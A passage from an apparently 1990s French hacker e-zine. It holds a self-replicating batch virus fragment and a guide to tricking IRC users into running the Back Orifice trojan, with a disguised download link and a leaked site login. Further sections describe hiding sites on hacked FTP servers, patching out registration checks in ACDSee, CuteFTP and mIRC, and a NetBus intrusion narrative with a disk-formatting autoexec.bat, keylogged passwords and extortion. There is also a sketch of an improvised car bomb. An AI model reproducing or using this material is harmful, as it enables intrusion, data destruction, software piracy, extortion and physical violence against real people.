1 goto inf %exevir% goto fininf %exevir% :inf %exevir% %exevir% set ok=%1 goto fininf %exevir% :debution %vir% type %good% |find "exevir" > exei.bat :fininf %exevir% for %%a in (*.com) do call exei.bat %%a %vir% if (%ok%)==() goto virenda %vir% ren %ok% *.>nul %vir% %vir% for %%a in (*.) do set ok=%%a type %good% |find "vir" > %ok%.bat %vir% attrib +r +h %ok%.bat %vir% ren %ok% %ok%’.com :virenda del exei.bat %vir% dir > mvtest.a %vir% del mvtest.a %exevir% %goodi% %vir% %vir% set ok= %vir% set good= %vir% set goodi= ****************** CODE SOURCE A UTILISER AVEC MODERATION ***************** --->9<--- INITIATION A B.O ---------------- bon alors c parti mail bolliop@caramail.com tuto sur back orifice de bolliop pour ke la scene francaise avance disc lamer -> prout intro : dans ce tuto , je vous donne mes technikes pour faire executer le client de bo(back orifice) au mec a ki vous voulez piker la connection si vous savez pas vous servir de back orifice , lisez l'help en anglais, et si vous savez pas parler anglais, ben apprennez voila pour l'intro technikes : toutes les technikes decrites ici,je les utilise perso, donc ca marche 1- technike de la photo alors vous trainez sur un channel, de preference avec des lamers et des obscedes, moa j'utilise irc.funradio.fr #funradio , c parfait le samedi soir -vous portez un nick de fille --> tres important( aurelia, stephie, marie ) enfin des noms chauds et pas gilberte ou raymonde par exemple -vous faites des dns( vous recuperez l'ip du mec) pour connaitre le serveur jusqu'a trouver le serveur ki vous interesse( easynet, wanadoo, infonie, clubinternet .....) -vous branchez en privés les mecs ki ont des connections ke vous voulez (prennez plusieurs mecs car bp ne se laissent pas avoir). et vous dites comme suit( moi je suis aurelie et lui grolame) slt ! slt :))))) t'as une photo ??? oui /non ( on s'en branle ) tu veux la mienne oui --> dcc send il faut un peu continuer a garder la conversation avec le mec pour k'il reste la. bon ce ke vous sendez( en dcc send) un fichier.zip > dedans une photo bidon un l'exe serveur bo s'appelant lismoi.exe ou un autre nom bon et ca devrait passer en disant ke l'exe est une description de la nana ( car vous etes une nana :))ou alors que c un poeme ou je sais pas koi 2-technike du site web alors le mec ki vous demande un logiciel ou un crack ou encore komment vous faites pour faire un truc bidon, vous lui dites d'aller sur votre site, sois vous mettez le serveur sur le votre( de site), soit vous utilisez mon site en effet sur mon site le fichier megateuf.zip dans la section download est un serveur de bo. g aussi mit le serveur non compressé a l'url www.chez.com/bolliop/webcam32.exe 3-autres technikes ke g prog en c++; g pas fini de les programmer mais g deux idées ki seront surement finies kant vous lirez ce tuto et disponibles sur mon site 1-un prog ki est un repertoire avec des tas de noms bidons et un back orifice serveur avec une extension pourrie mais surtout un exe ki renome l'exe de back orifice et le lance, sans ke le mec s'en apercoive :) 2- 2 me idee ki permettra a mon avis de passer a travers les protectecs comme bouffe troyen ou des trucs chiants cun exe ki se place dans la base de registre et verifie ke bo est tj la, et si il n'y est plus, il le remet :) voila les gars, c t cool non ? alors pour les connections ke vous avez obtenues en utilisant system passwords de bo il faut faire gaffe a un truc deja l'user a les formats suivants: pour clubinternet --> clubint/nom OU nom ( directos ) pour wanadoo --> fti/xxxxxxx (7 caracteres ki veulent rien dire --> attention avec wanadoo il faut respecter les majuscules et minus .) pour infonie inf1/199811811302195@infonie.fr --> bon ici g mit le seul exemple d'user infonie ke g je prefere pas me prononcer, en tout cas , g essayé avec cet user et un pass( ke g eu avec :)) et ca marche les passwords pour clubint : xxxxxxxx -> 8 caracteres pour wanadoo : xxxxxxxx -> 8 caracts, attentions tj aux majuscules pour infonie : 666666 -> 6 chiffres ensuite : desolé de pas vous donner de connections mais ce serait degue pour le mec (y'aurait tout l'underground sur sa connect)et puis si un mec ke g hacké lit ca il va pas etre content, donc g des raisons donc faites pas chier attention si vous avez une connection chez ci au format "nom" (clubint)ki marche pas , essayez de la mettre au format "clubint/nom", pareil pour wanadoo conclusion mais vous verrez c pas dur de se faire des connections surtout si on est pas cons mais si vous tombez bien vous pourrez degoter des pass de site de cul -> un petit exemple ke je peux vous donner: www.heatxxx.com user powerup pass quickly :) --> y'a meme une webcam, bon j'en ai d'autres mais ca me fait chier d'aller fouiller mes logs :) conclusion de la conclusion: vala , si vous avez pas compris, vous pouvez tj mailer car moi je reponds :) prout bolliop ratm stuff mega keupon mass casse toi de la akh t trolé --->10<--- LES UNDERSITEZ -------------- Ecrit par ThreaT EnFiN Un suJet QUe Tres Peut ConnAisse Mais Qui Existe BelLe Est Bien... LES UNDERSITES Putain, sa me soul! j'avais fait un super article sur les undersitez mais ce putain de Daub que j'avais foutu en dual avec ma red hat m'a peter a la geule suite a une tentative de repartitionnement d'un 2eme disk configurer en EZ drive avec une partoche LILO native accessible depuis une diskette dos. un cluster a voler en eclat dans le rep racine de daub ce qui m'a causer un gros bordel du a ce putain de scandisk qui m'a cree 45 repertoire, et qui m'a sodomiser une parti de mon swap, tout cela en pinant mon bo lilo que j'avais configurer avec Amour. donc, on vas la refaire moin crisper!! :( Bon je vais essayer de retrouver toute la subtiliter de mon premier article afin de vous espliker ce que c qu'un undersite ///////////\\\\\\\\\\\ LE SOMMAIRE MES FRERES \\\\\\\\\\\/////////// 0/intro. 1/C quoi un Undersite? 2/a quoi sa sert? 3/a qui sa sert? 4/comment les faire? 5/sa existe vraimment les undersite? 6/que peut on faire vraimment avec un undersite? 7/pourkoi tu t'enmerde a faire des Underistez? 8/juSt say Fuck with an undersite 9/Undersite! le vrai undernet, pour le vrai underground 10/finito. 0/INTRO ####### Comme je te connait tu doit te demander qu'est ce que je vais encore debiter comme connerie... mon petit, on vas parler de chose dont tu n'a meme pas ider! on vas parler du vrai underground, du monde des hackerZ, des sites des malades mantaux, on vas parler des iles au tresor des nouveau pirates on vas parler... des UNDERSITEZ 1/C QUOI UN UNDERSITEZ??? ######################### un Undersite est un site cacher dans un espace FTP pirater accessible a tous par le bier d'un lien secret. (definition tirer de "LE DICO DE THREAT" (je deconne)) concretemment, C quoi un undersite? ben en faite, un undersite est un site de hacker cacher sous un site de lamer a son insu MAIS qui n'est accessible que par un lien secret (Style Track sur internet) Petite demo pour mieux comprendre.... Mr Lamer a un beau site sur www.multimania.com/lamer Mr lamer est content car son site est un vrai site de lamer, qui parle de cul de sa copine, de ses vieux pote avec qui il se boure la guelle, de son chien, et tout et tout.. Bon! Mr PoteDuLamer vas sur le site de Mr Lamer. Mr PoteDuLamer est content car y'a plein de foto de lui avec son pote lamer sur un vrai site de lamer par lequel n'importe quel lamer peut aller voir sa salle gueulle de lamer (tu me suis lamer!) SOUDAIN!! Mr PoteDuLamer a un detaille qui lui acroche l'oeil (aļe) effectivemment, il y a une lettre dans le texte qui n'est pas exactemment de la meme couleur que les autres!! (bizard sa?) Mr PoteDuLamer (qui est curieux donc moin lamer que son pote) pointe le pointeur de sa salle souris Micro$ofT a 200 balles sur la lettre en question. EST QUE DECOUVRE T'IL EN CLIQUANT DESSUS?????? "Ho My GoD!" UN SITE P I R A T E "hhaaaaarrrgg" (le mec s'evanoui) "But WhaT AppEnd???" Un hacker a reussi a pirater le site de Mr lamer et a judisieusemment disimuler son site dans celui de sa victime (un genie quoi) 2/A QUOI SA SERT?? ################## Sache qu'un Undersite a pour premiere utitiliter, d'assouvir le besoin de conquete des nouveaux pirate. C une sorte de message qui dit a celui qui c'est fait hacked "j'ai forcer, jme suis poser et tu t'est fait baiser" sinon, a part sa, un undersite peut te servir a mettre toute les info que tu veut (MP3, Foto de estelle haliday, etc..) sans te soucier de rien. sa peut aussi te servier d'espace disk pour stocker tes connerie. sa peut aussi te servir (si tu vien de cree un nouveau virus)de distributeur. sa peut servir a plein de truc quoi, fo de l'imagination C tout. 3/A QUI SA SERT? ################ Les UnDersites, Sa sert a tout ceux de l'underground! Hackerz, Crackerz, Phreakerz & warez on tous plus ou moin une utiliter quelquonque de ce genre de site. POur le hacker, l'undersite seras un moyen de prouver sa capaciter a hacker, donnant une impression importante de force de frappe a sa victime, celui si pourat le faire chanter afin d'acceder a des zones plus importante. celui si pourat aussi divulguer une multitude de password sur son undersite, pour tenir en eveil toute sa horde. Pour le cracker, L'undersite seras l'ile deserte ou celui ci pourat enterrer tout ses crack et code source en ASM, ainsi que les dernier virii fraichemment coder. le phreaker, pourat divulguer au grand jour toute ses liste de scan ainsi que ses dernier resultat comportant les VMB, outdial, carrier & system voco forcer... ET pour le WARE! L'undersite seras son MAGAZIN SECRET. il pouras y mettre tout ses soft accessible seulemment par des connesseur qui auront prealablemment payer une redevance afin de connaitre l'adresse exacte ainsi que l'astuce pour pouvoir acceder a l'undersite. Donc, L'undersite peut servir a plein de monde, mais C bien gentille sa! mais.... 4/COMMENT LES FAIRE?? ##################### Ben, pour faire un undersite, C pas compliker. deja il fo hacker le site qui porteras l'undersite! ne me demande pas comment, y'a plein d'article pour le savoir. une fois ce putain de site hacked, tu cree dans l'espace FTP de ta victime un repertoire cacher style "MKDIR ALT+255+255" tu voi le truc! une fois ceci fait, tu fout tes belle page dessus, puis tu telecharge sur ton dur une page du site d'origine afin d'y inserer un lien qui mene vers ton site prealablemment cacher. Et Voila! tu a un beau undersite. 5/SA EXISTE VRAIMMENT LES UNDERSITEZ?? ###################################### Et oui man, contrairemment a ce que tu croit, le net est bourrer d'undersite. des mec en sont meme completemment fana! je connaissait meme des mec qui etait tellement acro, qu'ils ce levait la nuit pour voir si le dernier Under qui zavais trouver etait encore la! car, si le hacker a pour defi de mettre en place se genre de site, le newbie a pour mission de trouver un maximum d'undersite, car C la qu'il pouras trouver le maximum d'info pour debuter. puis, le faite de trouver un undersite est asser valorisant. si tu veut un exemple vas faire un tour sur http://members.aol.com/ldiezmench et cherche bien! car dans le site il y a un lien cacher qui de routra sur "ThreaT UndeRsiTe" mon undersite perso qui divulgue plein d'info croustiante (notamment un OUTDIAL) 6/QUE PEUT ON VRAIMMENT FAIRE AVEC UN UNDERSITE?? ################################################# a pars le plaisir de skoutaer un lame! un Undersite peut beaucoup servir a un groupe de HCP. effectivemment, pour que tout le monde connesse les coordonner de tout le monde, il fo un repere! et l'undersite est l'endroi parfait, surtout si on veut que les coordonner reste "confidentielle" L'undersite peut aussi servir de receuilee ou chakun pouras mettre les resultas de son travail. par exemple, on organise Une attake de PBX sur 0800331122 (PBX de FT) + une attak sur www.microsoft.com. on pouras connaitre tout ce que chakun a fait par exemple. ---------Section Phreak Attak DreaD "Ouai j'ai scanner tout les bateau + de 0 a 3000" cliker la pour les resultat "LINK" Maverick "j'ai trouver la BAL admin sur 5644, je continu" Shank "OK, j'ai fait du social! il y a 600 enployer, l'indik de sorti et le 0, et le standart et le 09" ThreaT "j'ai trouver 2 BAL, les pass default sont 2222 et l'OUt se trouve sur le 0 etc... --------Section HAck ATTack Bolliop "ok j'ai deja balancer 4 dico, les voila "LINK" Massilia "j'ai bientot terminer mon trojan, y'a plus qu'a ce faire le FTP" CD13H "ok, jvais sniffer toute l'area au cas ou billou ce lacherais" ThreaT "je brute l'acces FTP! j'en suis a REDGTR, mais j'a trouver Une IP qui fait confiance au serveur! jvais essayer de la spoofer" etc.... Donc, le site est tenu a jour chak foi que QQ1 trouve QQchose ce qui fait que tout le monde est au courant de la progression de l'attaque. L'undersite peut aussi servir a Piner du Lamer. effecivemment, tu fait une page qui ce fond parfaitemment avec le site hacker qui te propose de telecharger le dernier patch microsoft, qui est en faite un troyen. come sa, quand T sur IRC, tu chope un pov lame et tu lui dit que y'a un super patch sur www.victim.com! et le mec n'y vois que du feu en faite, les avantage de l'undersite sont "Liberter d'expression sur le site, gratuiter du site et confidentialiter d'accer" oui mais.. 7/POURKOI TU T'ENMERDE A FAIRE DES UNDERSITEZ? ############################################## newbie: "y'a plein de truc qui te donne 10Mo gratos! pourkoi tu t'enmerde la vie?" Parce que tes soit disant 10Mo gratos son controller comme l'eau que tu boit effectivemment, sur les espace gratuit, il y a des regle a suivre. si tu commence a mettre sur ton site des photo de estelle a poil, tu risk d'avoir des blem. de plus, ton site est referencer dans une base de donner ce qui ne te donne pas une parfaite confidentialiter. puis des que tu veut ajouter un ou 2 petit crack, tu te fait jarclos comme une grosse merde. NON, tout cela n'est pas serieux, rien ne vo un beau UNDERSITE. donc... 8/JUST SAY FUCK WITH AN UNDERSITE ################################# C vrai sa! pourkoi s'enmerder la vie a trouver des esplikation alors qu'il suffit de dire FUCK. rien ne vo un petit Undersite pour faire chier le monde entier. et oui, il suffit de faire une belle page bombe, et des que tu click sur le lien, BOUM aller faire un tour sur notre site www.chez.com/mvm, et cliquer sur BLAGUE. agacant non? ceci est un exemple de crasse qui pourait foutre les boule a plusieur centaine de personne. Mais bon, pour sa, je vous fait confiance ;) 9/UNDERSITE! LE VRAI UNDERNET, POUR LE VRAI UNDERGROUND ####################################################### Et oui! les undersitez, C le vrai undernet, la banlieu d'internet quoi! avec de vrai site pirate, qui font parti du vrai underground. mais je pari que la plupart des gens qui lise cette article n'en on jamais vue! donc, a vos souris les enfant! et partez a la chasse au Undersite. arf arf arf 10/FINITO. ########## Bon, ben voila! 7 article est fini. vous vous coucherez moin con se soir. et j'espere ne plus voir de reponde sur mon mail ou sur un channel du type "Undersite? C quoi cte bete? sa se mange?" et autre reponse de lame sous developper. j'espere aussi que tout les hacker qui lise ceci vont se mettre a cette pratique divine au lieu de tout piner comme des blaireaux. aller, Jµ$T $@Y Fµ(K W1T# @N µNd3r$1T3. ThreaT. email: ThreaT@Caramail.com --->11<--- COUR DE CRACK I --------------- Cracking I Intro : cette section va parler de cracking un peu logique non. Je vais essaye de vous apprendre a cracke tout les petits softs sur le Net. Pour toutes les pages que je vais ecrire je tenterai de vous montrer comment cracke tel ou tel soft Nous allons donc commencer par le matos (Software) du petit cracker sous windaube : SoftIce Le meilleur Debug sous windows 95,c'est le soft qui vous permetra de faire les tests de changements dans une application WDasm Un deasm pour win95 avec DlgRef et Stringref .... ce Soft permet de prendre vos marques dans une app,de remarquer quelque bonnes addrs genre protec et autre .. HexWorkShop Un petit soft qui vous permet de modifie (sur disque dur a vie quoi) les apps que vous avez cracke avec succes ... Serial : GM000007 Petite precision quand j'utilise // ca veux dire que derriere c'est du commentaire Bon Now passons au choses serieuses cette fois nous allons cracke AcdSee32 Ver:2.4, bon c'est un soft pour lire les images trop rapidement. Commencons par le debut on lance l'executable et la en haut au dessus du menu nous remarquons le petit "[unregistered]".En plus quand on lit 2 ou 3 photos un dialogue(boite de dialogue) a la con sort et vous rappel que vous ete unregistered, ca c'est vraiment chiant !!!!! Bon apres ces quelques constations vous sortez Wdasm et Deassemble acdsee32.exe ... bon on attend un peu ca dure quelque secondes .... Nous avons constate que ascdsee porte dans ca barre le string (ou suite de caractere) [unregistered] donc nous allons faire une recherche de ce string (Menu Search --->FindTExt) .. Nous tombons a la ligne *possible use of string ref "[unregistered]" //avec cette ligne Wdasm vous indique que le push en dessus va charge "[unregistered]" 401334 6848e04b00 push 4be048 // le first number est la ligne programme , le second est la commande qui va etre envoyer au processeur et enfin push addr est la ligne equivalente en asm du code processeur envoye :) En traduction francaise au prochains call "[unregistered]" sera envoye ( call est un appel de fonction call addr), donc c'est ici que Acdsee rajoute le unregistered en haut donc nous pouvons pense que haut dessus il y a le code qui permet de s'avoir si vous ete register ou pas regardons ... 40131d call 407370 //appel d'une fonction mov ebx,dword ptr [4aa310] //semble place dans ebx un resultat cmp eax,1 //compare le registre eax,1 je 0040133c //si la comparaison est bonne saute en 40133c Comme par hasard en cas de bonne comparaison ca saute le unregistered continuons notre recherche (Avec la touche F3 Find Next).. 40173d call 407370 cmp eax,1 je 401775 Bon la c'est la meme chose il appel 407370 et puis saute le [unregistered] si eax est a 1. La nous devons avoir trouve la fonction qui s'occupe de savoir si utilisateur est registered ou pas ... Nous remarquons que si utilisateur est register la fonction met eax a 1 Donc nous allons modifie la fonction pour quel ne retourne que 1 dans tout les cas !!! :) On sort softice, en cliquant dans demarrer programmes Softice Symbol Loader ensuite load ascdsee32.exe et module Load et puis enfin "ok" On arrive dans une fenetre dos (ASCII), bon ici il faut taper bpx 407370, cela dit a softice de s'arrete des que le programme(debug donc acdsee) passe pas la ligne 407370 ... On appui sur F5 pour dire a softice de continue app... Et hop ca revient sous SoftIce ca veut dire que Acdsee a tente execute la fonction pour voir si registered .... maintenant a nous de la change (rappel en sorti de fonction eax doit etre egal a 1) Pour changer la fonction on tape "a" (ce qui veut dire assemble pour softice) puis on tape mov eax,1 // met eax a un puis ret //retourne a la fonction appelante en gros fin de fonction ensuite sur escape ce qui nous remet en mode normal ... puis f5 pour continuer et a votre plus grande joie vous ne voyez plus le unregistered (quel pied non) voila , vous allez dans about et register et a la place de votre nom il y a rien bof c'est chiant .... nous allons chercher ou il prend le nom d'utilisateur, il y a grande chance que ca soit dans la base de registre,donc deasm ( avec Wdasm pour ceux qui ont pas suivi) et cherchons les appels base de registre,je vous le donne RegQueryValue ... vous cherche un peu et vous trouver un appel de l'API avec en dessous utilisation de regname ca y est vous avez trouve sortez regedit ... allez dans HKEY_LOCAL_MACHINE (c'est la ou tout les soft met leur truc) en suite dans software\Acd System\AcdSee\2.3 et la fait une cle chaine "Regname" avec ce que vous voulez dedans ensuite avec softice remodifie 407370 (parce que les modif que vous faite avec softice ne sont valable qu'une fois ) ... et la allez dans about register et la il y a le contenu de la chaine formidable ... Enfin nous allons finalise le crack pour instant votre executable n'a pas ete modifie (il est originale ),donc relancons un Module Load (dans Softice) et arrive a 407370 avant de faire les modif tape e eip cette commande va vous montrer le code envoyer au processeur notez une 15 ene de nombres puis faite les modifs et note les difference dans la fenetre e (l'endroit ou vous avez note les nombres certain ont changes car vous avez change les truc en asm) Arrive ici sorte HexWorkShop load ascdsee32.exe recherche les 15 premier chiffre une fois trouver modifie pour obtenir les nombre apres ... sauve et voila vous Venez de finir votre premier crack pas cool ca .... :) Bon la prochaine fois ce sera cuteftp 2.5 qui passera au cracking allez ZA+++ A oui en cas erreur(s) ou de prob(s) vous pouvez ecrire a Ragez@francemel.com --->12<--- COUR DE CRACK II ---------------- Cracking II Intro : Bon cette page ci nous allons cracke du soft trop laid niveau protek genre je change deux jz et ca marche) tout d'abord CuteFtp 2.6.1 et ensuite et Mirc 5.5... :) On commence par CuteFtp, bien sur c'est la derniere version .... Nous allons donc deasm (wdasm Voir page cracking I pour logiciel) cuteftp32.exe, en meme temps on lance cuteftp on va dans about et la "UNREGISTRED VERSION", bon donc nous cherchons ca dans l'exe avec wdasm (search --> find text) au miracle nous obtenons la ligne :0040108a 6825010000 push 00000125 L'appel de la fonction qui doit determiner si user est unregistered doit etre dans les parage remontont un peu (401060 Conditional ) hmmmmm tient cool ce code call 411a90 test eax,eax je 401083 Bon la c'est evident il y a de grande chance que 411a90 soit la fonction qui sert a determine si register ou pas, nous allons donc teste ca en fausant le test pour cela nous utiliserons softice .... Let's rock :) .... On load cuteftp32.exe dans le symbol loader de softice on met le bpx 406010 on appui sur F5 (continue) on fait about, softice s'arrete sur le breakpoint et la on fait assemble (commande :a)et on remplace le jz par un jnz... puis F5 et au grande joie le UNREGISTERED c'est casse pour des caracteres bizarre. bon gracee a cette demonstration nous somme sure que 411a90 s'occupe de la registration , resortons wdasm et allons en 411a90, ok la fonction est appele trois fois en 401059 413479 42F06f, bon la logique montre que voila dans les trois c'est la meme chose il suffit de remplace le jz par des nop (ou jnz)..... Bon voila soft est deplomb parcontre les caractere bizarre dans about c'est not cool mais bon supportable quand on pense que ca fesait chier avant ... Bon vous faite les modif avec HexworkShop (cf cour I de cracking) ... et Voila :) Passons now au deuxieme soft Mirc ... Bon nous executons le truc on va dans help register un user et un pass au pif et la appareit une MessageBox avec comme message sorry your registration ... don't match. Donc nous deasm la chose et nous nous mettons en quete du message (pq donc car dans les parage il doit avoir la fonction pour la registration he he ). Nous tombons a la ligne :435df0 push machin... Bon now regardons au dessus la juste au dessus "your registration is ...." et encore au dessus du code qui ressemble a ca :435d02 call 492278 test eax,eax je 435daa Bon Vraiment interesant maintenant testons ce petit code (meme s'il parait evident que c'est la protek nous somme pas presse), on lance softice (Module load et bordel cf prm cour) bpx 435d02, bon je vous donne un nouvelle ruse pour teste ... bon vous allez dans register vous faite register avec des truc au pif la softice ressort logique vous tape p (cette commande passe a la ligne suivante du code) puis r (commande vous donne les etat de tout les registre et permet de modifie leur valeur)et vous mettez eax a 1 voir et la c'est bon ... Donc nous revenons a deasm et allons a la fonction 492278 pour voir qui l'appelle :) bon la on voit que la ligne 49240f sera aussi a modifie ... On modifie les deux ligne en question ... on relance mirc et la pas register c'est quoi ce bronc ... et ouis en faite il suffit etre intelligent ( et logique) la pluspart (meme tous now ) des soft verifient votre registration a chaque ouverture de l'app, c'est aussi le cas pour mirc de plus pour verifie votre registration la fonction de protek a besoin de votre nom et code (encore un fois logique)... Donc la on regarde au dessus de l'appel en 4923df et la au joie mirc load deux cle dans la base de registre name & code (avec la fonction RegQueryValueEx),donc faite une cle dans la base de registe : HKEY_CURRENT_USER\software\mirc\name et la mettez une valeur chaine, bon la logique veut que aussi le menu register ne soit plus accesible si vous ete deja register donc il n'est en realite pas utilile (si la cle est presente en base de registre) de change l'appel en 4923d2, a oui aussi vous allez me repondre pq on ne change pas la fonction 492278 pour qu'elle ne retourne plus que 1 (comme ascdsee voir premier cour) tout simplemnt parce que il y a CRC je vous expliquerez cette protek sur la prochaine stuff qui sera sur Winzip 6.4 (je sais c'est pas la derniere mais vous allez comprendre) :) (Suspense) J'oubli modifie avec HexWorkShop bien sur he he A oui en cas erreur(s) ou de prob(s) vous pouvez ecrire a Ragez@francemel.com --->13<--- CYBER AGRESSION --------------- DisK Lamer! La cyber agression N'est pas du hacking! a ne pas confondre SVP ThreaT. ------(((<<<>>>)))------ I:/Definition du contexte ---------------------------- Toute les technik, exemple et supercherie qui vont suivre on eter pratiker sur AOL! POURQUOI? Parce que c'est l'un des provider qui a la reputation d'etre "PROTEGER" contre les agression, parce que sur AOL, c'est bourrer de LAmerZ qui parle de cul et de jeu video! sa ferat reflechier toute ses petite tapette qui se prenne pour des dieu avec leur punter et aussi ceux qui menace de "NUKE" Vous avez dejas nuker QQ1 sur AOL vous ? moi oui, mais je doute que newbie que vous soyer, vous ne pouviez assumer cette tache qui n'est appliker qu'en cas de lamerositer fessant tourner en bouriK le cyber agresseur. Bon aller, y'en a marre du bla bla... ACTE I/Parlons Boulot!!!! ---------------------------- Pour pratiquer une bonne petite agression via AOL, voila le matos *1/UNe becanne avec une bonne chtite connection sur le telephone *2/Un explorer AOL en version "US" 3/Un chtit scanner d'IP *4/Une chtite commande DOS appeller PING *5/deux soft appeler "Netbus" et "socket23 V 2.5" 6/Quelque notion en BAtch 7/Un login et un password Pirate *8/des Talent de Social ---Matos qui peut se rajouter, mais non obligatoire--- un nuker un punter un soft de traitemment d'IP style "WS_PING ProPAck" un pote qui n'a pas froid au yeux PS: les ligne marquer par l "*" sont la liste des chose INDISPENSABLE ACTE II/Preaparons nous a l'attaque --------------------------------------- Bon, Maintenant que (bande de guerrillos que vous aite) vous vous etes procurer tout ce beau fourbit, il faut parametrer tout sa, preparer vos arme! ->Bon, primo, allez voir dans votre paneau de config l'option reseau! clicker 2 fois sur TCP/IP et specifier que vous vouler que votre IP soit donner automatiquemment. C bon? ->secondo, prener netbus et SOcket 2.5, lancer le generateur de virii du socket et infecter le fichier Patch.exe de netbus ->Tercio, preparer un petit programme batch dans votre repertoire de hack que vous appellerer "Autoexec.bat" ecriver dans ce fichier les instuction suivantes! @echo off cls echo Fallait m'ecouter espece de connard.... echo o| format c: Si vous vous demander a quoi vas servir ce fichier, attender la suite, car la, on en ait a la preparation. ->Quatro, connecter vous sur AOL US,loger vous sur votre compte et optener un compte pirate.(si vous avez deja un compte pirate referez vous au quatro bis) ->Quatro Bis, lancer votre AOL US, en seletionnant l'option "GUEST" lorsque vous arriver a l'etape LOGIN, PASSWORD, inserer les coordonner de votre compte pirate ->Qatro tierce, creer un nouveau pseudonyme et connecter vous y, mais bon, sa vas pas etre le pied ->Cinquo, contacter vos pote (si vous vouler faire une attaque a plusieur) creer un salon priver et determiner ce que chaqun doit faire C bon! Yééé, maintenant Nous alons partir a la quete d'une victime potentiel, appeller plus comunemment le "LameHunting" Pour pratiker le Lamehunting il ne faut pas hesiter a utiliser ses talent de social et ne pas lesiner sur le Mytho! petite demo de Lamehunting pRatiquer sur AOL """"""""""""""""""""""""""""""""""""""""""""" Vous venez de rentrer dans le salon "Point de rencontre 1" LameA: qui veut faire un jeu en reseau LameB: moi je suis un pro de warcraft LameA: T'a de la chance que mon modem soit pourit sinon j'taurait mit la pater LameB: ho lotre heu! ThreaT: hé LameA, si tu veut, j'ai un truc pour faire buster ton modem --------------------- Message eclaire de "LameA" LameA: T'a vraiment un truc pour faire booster mon modem ThreaT: oui, j'ai un patch qui te fait augmenter ta vitesse de connection LameA: Mais sa marche comment? ThreaT: Le patch modifie le bridage de ton modem qui est loger dans ses instruction, Car les modem sont brider Logicielemment LameA: ha wouai! ThreaT: Bien sur que oui, tu nle savait pas? LameA: Ben non, J'ai un 9600, sa vas buster a combient?? ThreaT: Le patch vas te faire Buster a 56000bds LameA: Vas y envoie ThreaT: Attend, il faut d'abord que je sache si c'est compatible avec ta connection AOL LameA: ?? LameA: Et comment on fait pour savoir? ThreaT: Ok, suit mes instruction LameA: ok, j'ecoute ThreaT: tu click sur demarrer ThreaT: executer ThreaT: Tu tape c:\windows\winipcfg.exe ThreaT: Tu met OK ThreaT: si ton adresse IP = 0.0.0.0, C griller! ThreaT: Alors? LameA: C bon, y'a plein de chiffre ThreaT: quoi comme chiffre? LameA: 152.173.23.103 ThreaT: Ok, 2 seconde (la je lance une fenetre DOS et je tape PING 152.173.23.103) (DOS me repond Pinging 152.173.23.103 10ms bla bla bla) (Donc, son IP et valide, la je revient a la conversation) ThreaT: C bon, Ta connection est compatible, je t'envoi le patch LameA: kool (Donc la, je lui envoi par Mail le patch de netbus infecter par socket 2.5) ThreaT: Alors? tu l'a recu? LameA: Ok attend, je telecharge! (La, je lance nebus, socket 2.5 et je prepar mon petit fichier autoexec.bat) LameA: C bon, j'ai telecharger (Maintenant j'insere son IP dans Netbus) ThreaT: execute le fichier maintenant LameA: Ok (J'appuye sur connect jusqu'a qu'apparaisse "connected to 152.173.23.103) ThreaT: Alors?? LameA: Y, spasse rien!! (Ce que LameA ne sait pas, c'est que je suis connecter directemment sur sa becanne et que j'ai un control ABSOLU) ThreaT: C normal, il faut que tu fasse une petie manip LameA: quel genre? (La, je click sur "Listen" dans netbus) (pour ceux qui connaisse pas Netbus, Listen est la fonction de snif du logiciel) ThreaT: Il faut que tu cree un fichier TXT dans c: LAmeA: et comment je doit l'appeller ThreaT: apelle le HOST.TXT LameA: OK, est que ce que je doit y marquer ThreaT: il faut que tu y insere Ton LOGIN et ton PASSWORD LameA: Sous quel forme? ThreaT: sous la forme LOGIN,PASSWORD lameA: Et apres? ThreaT: apres tu sauvegarde, et le patch vas faire mouliner ton disk (la, je sort le socket de troi et insere l'IP du lame! et attend pour me connecter, ensuite je regarde ma fenetre Listen, qui, je le rappelle m'indique tout ce que tape la victime) (je regarde lettre par lettre la victime taper son login et son password par exemple il ecrit "lameA,32566", une fois qu'il a fini de taper, je lance la connection au virus de troi) lameA: sa y'est mon disk mouline, qu'est ce que je fait maintenant ThreaT: Tu attend! LAmeA: attend quoi? (la je me fou sur son dur, et lui suprimme son autoexec.bat pour le remplacer par le mien, ) ThreaT: attend 5mn (je contacte mes pote est leur donne L'IP de ma victime) LameA: T sur que sa vas marcher? ThreaT: je vais t'espliquer LameA: vas y, esplik ThreaT: Je vien de pirater ton system, si tu tente de de deconnecter ou d'arreter ta machine, ton dur seras formater automatikemment, Ta machine est totalemment sous control, je peut voir tout ce que tu tape, si l'un de mes complisse doute que tu tente d'appeller de l'aide, c'est le formatage IMMEDIAT LameA: ????, T en train de te foutre de moi la (la je click sur OPEN CDROM de netbus) ThreaT: regarde ton CD rom LameA: Ho putain, il c'est ouvert tout seul (Maintenant je click sur "control Mouse") ThreaT: regarde ta souris LameA: comment tu fait, elle se deplace toute seul ThreaT: Ferme ta gueule, ceci est du racket d'information! LameA: quoi, jvais appeller les flic ThreaT: il me suffit d'appuyer sur un bouton et ton dur est naze, tu ne pourat meme plus rebooter LameA: ARRete, j'ai toute mes image de cul sur le disk ThreaT: raison de plus pour que tu obeisse LameA: attend, t'a combien de complisse? ThreaT: TA GUEULE!!! LameA: sale malade mental (la je click sur "msg manager" de netBUS et le lui envoi une joli chtite fenetre ou faux clicker sur OK avec le texte suivant "Ici, c'est moi le boss, alors t'as interet a fermer ta gueule") (et la netbus me dit "ANswer:OK", sa veut dir que la victime a effectivemment cliker sur OK) Je vous laisse imaginer la suite..., tout ce que je peut dire C que la victime si dessus nous a reveler son nom, prenom, age, adresse, N° de tel, mais n'a pas voulu lacher son N° de CB. Je tient quand meme a signaler que le disk de la victime n'a pas eter formater, une interuption 18h a ete plomber dans l'autoexec.bat simulant ainsi l'imposibiliter de booter sur le disk! Voila une demo qui vas fermer des gueules!! Mais savez vous que l'agression peu devenir "Physique" COMMENT? J'ai le nom et prenom, j'ai l'adresse et le tel! qu'est ce qui m'empeche d'aller voir ce mec cher lui pour lui dire en face ce que je pense. qu'est ce qui m'empeche d'appeller ce mec pour lui envoyer des menace de mort? PUtain mais merde, qu'est ce qui m'empeche de prendre 50% de sucre avec 50% de clorate de soude, de melanger le tout, de plonger une resistance chauffante dans la mixture et de refermer le tout hermetiquemment dans une bouteille de gaZ, et de brancher les 2 fils de la resistance chauffante sur l'un des clignotant de ma victime, dite moi ce qui m'en empeche??? La loi!, vous avez raison. puis bon, chu pas malade a ce point, meme si jconnait des gars pret a le faire contre une petite remuneration. je dit cela car internet, C pas comme le telephone! on peut ce faire niker , donc, si vous ete debutant en informatik, commencer pas a sortir votre bite sur le web, sa fait mauvais genre! Puis ceci n'est qu'une demonstration, 